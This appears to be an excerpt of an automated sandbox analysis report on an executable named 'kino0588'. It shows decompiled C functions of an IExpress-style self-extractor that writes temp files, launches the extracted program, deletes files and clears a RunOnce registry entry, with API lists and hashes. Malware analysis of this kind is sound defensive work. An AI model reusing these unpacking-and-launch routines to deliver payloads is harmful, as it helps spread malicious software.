				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E00191680(_t20, _t36, _t33);
					E0019658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0x199124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E001944B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0x199124 = E00196285();
					_t14 = 0;
				}
				return _t14;
			}













                                                                                                                                                                                                                                    0x001958cd
                                                                                                                                                                                                                                    0x001958d1
                                                                                                                                                                                                                                    0x001958d3
                                                                                                                                                                                                                                    0x001958d5
                                                                                                                                                                                                                                    0x001958d8
                                                                                                                                                                                                                                    0x001958d8
                                                                                                                                                                                                                                    0x001958da
                                                                                                                                                                                                                                    0x001958db
                                                                                                                                                                                                                                    0x001958e1
                                                                                                                                                                                                                                    0x001958ed
                                                                                                                                                                                                                                    0x001958f1
                                                                                                                                                                                                                                    0x0019591e
                                                                                                                                                                                                                                    0x0019592c
                                                                                                                                                                                                                                    0x00195943
                                                                                                                                                                                                                                    0x0019594a
                                                                                                                                                                                                                                    0x0019594d
                                                                                                                                                                                                                                    0x00195953
                                                                                                                                                                                                                                    0x00195959
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019595b
                                                                                                                                                                                                                                    0x0019595c
                                                                                                                                                                                                                                    0x00195963
                                                                                                                                                                                                                                    0x0019596c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195972
                                                                                                                                                                                                                                    0x00195974
                                                                                                                                                                                                                                    0x0019597a
                                                                                                                                                                                                                                    0x0019597a
                                                                                                                                                                                                                                    0x0019596c
                                                                                                                                                                                                                                    0x001958f3
                                                                                                                                                                                                                                    0x00195901
                                                                                                                                                                                                                                    0x00195906
                                                                                                                                                                                                                                    0x0019590b
                                                                                                                                                                                                                                    0x00195910
                                                                                                                                                                                                                                    0x00195910
                                                                                                                                                                                                                                    0x00195918

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00195534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 001958E7
                                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00195534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00195943
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00195534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 0019594D
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00195534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 0019595C
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00195534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00195963
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                    • API String ID: 747627703-3705647674
                                                                                                                                                                                                                                    • Opcode ID: 66893340c9cced94eb803d92e1f4fa65e7bf39a0976cb5be810471efb0104d6d
                                                                                                                                                                                                                                    • Instruction ID: c1e2afc46589353ca7adb93bb9bbec2038af4fb19ca20d9f17f3c17967b6fa95
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66893340c9cced94eb803d92e1f4fa65e7bf39a0976cb5be810471efb0104d6d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A11087160021077DF245F796C4DB9B7E9EEF46374B10062AF505E31D1DB70984687E1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00193FEF Relevance: 10.6, APIs: 7, Instructions: 97processsynchronizationwindowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 631 193fef-194010 632 19410a-19411a call 196ce0 631->632 633 194016-19403b CreateProcessA 631->633 634 194041-19406e WaitForSingleObject GetExitCodeProcess 633->634 635 1940c4-194101 call 196285 GetLastError FormatMessageA call 1944b9 633->635 638 194091 call 19411b 634->638 639 194070-194077 634->639 647 194106 635->647 646 194096-1940b8 CloseHandle * 2 638->646 639->638 642 194079-19407b 639->642 642->638 645 19407d-194089 642->645 645->638 648 19408b 645->648 649 194108 646->649 650 1940ba-1940c0 646->650 647->649 648->638 649->632 650->649 651 1940c2 650->651 651->647
                                                                                                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                                                                                                    			E00193FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0x198004; // 0x21bd9a3c
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E00196CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0x199124 = E00196285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
					_t45 = 0x4c4;
					E001944B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0x198a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0x199a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0x199a2c = _t44;
						}
					}
				}
				E0019411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0x199a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}


















                                                                                                                                                                                                                                    0x00193fef
                                                                                                                                                                                                                                    0x00193ffa
                                                                                                                                                                                                                                    0x00194001
                                                                                                                                                                                                                                    0x00194008
                                                                                                                                                                                                                                    0x0019400a
                                                                                                                                                                                                                                    0x0019400b
                                                                                                                                                                                                                                    0x00194010
                                                                                                                                                                                                                                    0x0019410a
                                                                                                                                                                                                                                    0x0019411a
                                                                                                                                                                                                                                    0x0019411a
                                                                                                                                                                                                                                    0x0019401c
                                                                                                                                                                                                                                    0x0019401d
                                                                                                                                                                                                                                    0x0019401e
                                                                                                                                                                                                                                    0x0019401f
                                                                                                                                                                                                                                    0x00194033
                                                                                                                                                                                                                                    0x0019403b
                                                                                                                                                                                                                                    0x001940ca
                                                                                                                                                                                                                                    0x001940e9
                                                                                                                                                                                                                                    0x001940f8
                                                                                                                                                                                                                                    0x00194101
                                                                                                                                                                                                                                    0x00194106
                                                                                                                                                                                                                                    0x00194106
                                                                                                                                                                                                                                    0x00194108
                                                                                                                                                                                                                                    0x00194108
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194108
                                                                                                                                                                                                                                    0x00194049
                                                                                                                                                                                                                                    0x0019405c
                                                                                                                                                                                                                                    0x00194062
                                                                                                                                                                                                                                    0x00194068
                                                                                                                                                                                                                                    0x0019406e
                                                                                                                                                                                                                                    0x00194070
                                                                                                                                                                                                                                    0x00194077
                                                                                                                                                                                                                                    0x0019407f
                                                                                                                                                                                                                                    0x00194089
                                                                                                                                                                                                                                    0x0019408b
                                                                                                                                                                                                                                    0x0019408b
                                                                                                                                                                                                                                    0x00194089
                                                                                                                                                                                                                                    0x00194077
                                                                                                                                                                                                                                    0x00194091
                                                                                                                                                                                                                                    0x0019409c
                                                                                                                                                                                                                                    0x001940a8
                                                                                                                                                                                                                                    0x001940b8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001940c2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001940c2

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateProcessA.KERNELBASE ref: 00194033
                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00194049
                                                                                                                                                                                                                                    • GetExitCodeProcess.KERNELBASE ref: 0019405C
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0019409C
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 001940A8
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 001940DC
                                                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 001940E9
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3183975587-0
                                                                                                                                                                                                                                    • Opcode ID: a6102785fb9a2b076032dea499e9ac00cee100ebc9861d4797ff9b105eb496c0
                                                                                                                                                                                                                                    • Instruction ID: d864c02da5a7081a4f802d1ba693a51f35f24e40c83599025b378ac0c9d284cd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a6102785fb9a2b076032dea499e9ac00cee100ebc9861d4797ff9b105eb496c0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B431BF31641218ABEF209F65DC49FAB777CEB95710F2001AAF605D25A1CB315DC6CB61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 001951E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 652 1951e5-19520b call 19468f LocalAlloc 655 19522d-19523c call 19468f 652->655 656 19520d-195228 call 1944b9 call 196285 652->656 662 19523e-195260 call 1944b9 LocalFree 655->662 663 195262-195270 lstrcmpA 655->663 670 1952b0 656->670 662->670 664 19527e-19529c call 1944b9 LocalFree 663->664 665 195272-195273 LocalFree 663->665 674 19529e-1952a4 664->674 675 1952a6 664->675 668 195279-19527c 665->668 672 1952b2-1952b5 668->672 670->672 674->668 675->670
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E001951E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E0019468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E0019468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E001944B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0x199124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0x199124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E001944B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0x199124 = 0x80070714;
					goto L10;
				}
				E001944B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x199124 = E00196285();
				goto L10;
			}






                                                                                                                                                                                                                                    0x001951fb
                                                                                                                                                                                                                                    0x00195207
                                                                                                                                                                                                                                    0x0019520b
                                                                                                                                                                                                                                    0x0019523c
                                                                                                                                                                                                                                    0x00195268
                                                                                                                                                                                                                                    0x00195270
                                                                                                                                                                                                                                    0x0019528b
                                                                                                                                                                                                                                    0x00195293
                                                                                                                                                                                                                                    0x0019529c
                                                                                                                                                                                                                                    0x001952a6
                                                                                                                                                                                                                                    0x001952b0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001952b0
                                                                                                                                                                                                                                    0x0019529e
                                                                                                                                                                                                                                    0x00195279
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019527b
                                                                                                                                                                                                                                    0x00195273
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195273
                                                                                                                                                                                                                                    0x0019524a
                                                                                                                                                                                                                                    0x00195250
                                                                                                                                                                                                                                    0x00195256
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00195256
                                                                                                                                                                                                                                    0x00195219
                                                                                                                                                                                                                                    0x00195223
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946A0
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: SizeofResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946A9
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946C3
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: LoadResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946CC
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: LockResource.KERNEL32(00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946D3
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: memcpy_s.MSVCRT ref: 001946E5
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001946EF
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00192F4D,?,00000002,00000000), ref: 00195201
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00195250
                                                                                                                                                                                                                                      • Part of subcall function 001944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00194518
                                                                                                                                                                                                                                      • Part of subcall function 001944B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00194554
                                                                                                                                                                                                                                      • Part of subcall function 00196285: GetLastError.KERNEL32(00195BBC), ref: 00196285
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                    • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                    • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                    • Opcode ID: 9fff34f7d5bb16f4bb3073badf16a7ae8d2ee64ddf6004fae8a754b65d0dc6d1
                                                                                                                                                                                                                                    • Instruction ID: 3e2a7c52aebc6cb830a1e505d3b72b8610a2bf63bae4ca7cd7b149f595ddef5c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9fff34f7d5bb16f4bb3073badf16a7ae8d2ee64ddf6004fae8a754b65d0dc6d1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 351104B1200201BBEF156B755C49F3F619EEF99390B50403EF642E6690EB788C414279
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 001952B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 74%
                                                                                                                                                                                                                                    			E001952B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0x198004; // 0x21bd9a3c
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0x1991e0; // 0x2818f08
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0x198a24 == 0 &&  *0x199a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0x198a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0x198a24 == 0 &&  *0x199a30 == 0) {
					_push(_t22);
					E00191781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
					if(( *0x199a34 & 0x00000020) != 0) {
						E001965E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E00192390( &_v268);
					_t11 =  *0x198a20; // 0x0
				}
				if( *0x199a40 != 1 && _t11 != 0) {
					_t11 = E00191FE1(_t22); // executed
				}
				 *0x198a20 =  *0x198a20 & 0x00000000;
				return E00196CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}












                                                                                                                                                                                                                                    0x001952b6
                                                                                                                                                                                                                                    0x001952b6
                                                                                                                                                                                                                                    0x001952b6
                                                                                                                                                                                                                                    0x001952c1
                                                                                                                                                                                                                                    0x001952c8
                                                                                                                                                                                                                                    0x001952cb
                                                                                                                                                                                                                                    0x001952cc
                                                                                                                                                                                                                                    0x001952d4
                                                                                                                                                                                                                                    0x001952d6
                                                                                                                                                                                                                                    0x001952d7
                                                                                                                                                                                                                                    0x001952de
                                                                                                                                                                                                                                    0x001952e0
                                                                                                                                                                                                                                    0x001952f2
                                                                                                                                                                                                                                    0x001952fa
                                                                                                                                                                                                                                    0x001952fa
                                                                                                                                                                                                                                    0x00195302
                                                                                                                                                                                                                                    0x00195305
                                                                                                                                                                                                                                    0x0019530c
                                                                                                                                                                                                                                    0x00195312
                                                                                                                                                                                                                                    0x00195316
                                                                                                                                                                                                                                    0x00195316
                                                                                                                                                                                                                                    0x00195317
                                                                                                                                                                                                                                    0x0019531c
                                                                                                                                                                                                                                    0x0019531f
                                                                                                                                                                                                                                    0x00195333
                                                                                                                                                                                                                                    0x00195345
                                                                                                                                                                                                                                    0x00195351
                                                                                                                                                                                                                                    0x00195359
                                                                                                                                                                                                                                    0x00195359
                                                                                                                                                                                                                                    0x00195363
                                                                                                                                                                                                                                    0x00195369
                                                                                                                                                                                                                                    0x0019536f
                                                                                                                                                                                                                                    0x00195374
                                                                                                                                                                                                                                    0x00195374
                                                                                                                                                                                                                                    0x00195381
                                                                                                                                                                                                                                    0x00195387
                                                                                                                                                                                                                                    0x00195387
                                                                                                                                                                                                                                    0x0019538f
                                                                                                                                                                                                                                    0x001953a0

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetFileAttributesA.KERNELBASE(02818F08,00000080,?,00000000), ref: 001952F2
                                                                                                                                                                                                                                    • DeleteFileA.KERNELBASE(02818F08), ref: 001952FA
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(02818F08,?,00000000), ref: 00195305
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(02818F08), ref: 0019530C
                                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(001911FC,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00195363
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00195334
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                                                    • API String ID: 2833751637-256195474
                                                                                                                                                                                                                                    • Opcode ID: a69f6742fde2efee921f9c8421b4d0ba3cad6493ce73a7fefa1c5442322bd1f3
                                                                                                                                                                                                                                    • Instruction ID: 1919be85bf1c68c0f7d5ad6825ac718ada76de4fdd141f035d59aad3d04785c2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a69f6742fde2efee921f9c8421b4d0ba3cad6493ce73a7fefa1c5442322bd1f3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D21C031500614EBDF229B24EC09B6977B5FB14790F48016BF846A39A0CFB06EC8CB85
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00191FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23registryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00191FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0x198530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup3"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}





                                                                                                                                                                                                                                    0x00191fee
                                                                                                                                                                                                                                    0x00192005
                                                                                                                                                                                                                                    0x0019200d
                                                                                                                                                                                                                                    0x00192017
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192020
                                                                                                                                                                                                                                    0x0019200d
                                                                                                                                                                                                                                    0x00192029

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0019538C,?,?,0019538C), ref: 00192005
                                                                                                                                                                                                                                    • RegDeleteValueA.KERNELBASE(0019538C,wextract_cleanup3,?,?,0019538C), ref: 00192017
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(0019538C,?,?,0019538C), ref: 00192020
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup3
                                                                                                                                                                                                                                    • API String ID: 849931509-2968168367
                                                                                                                                                                                                                                    • Opcode ID: 6504a91e74980636c05e5ea54118e4cda8d8c444c9e73875358e36b11db5085d
                                                                                                                                                                                                                                    • Instruction ID: 0ca91ff57f6cf1c29a907b1244716631ae53d0f8fd2daf617cd7ee999e5153f7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6504a91e74980636c05e5ea54118e4cda8d8c444c9e73875358e36b11db5085d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0EE08630550318FBEF219F90EC0AF6D7B29FB02740F580196F904E0460EB715E98D645
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00194CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                    			E00194CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
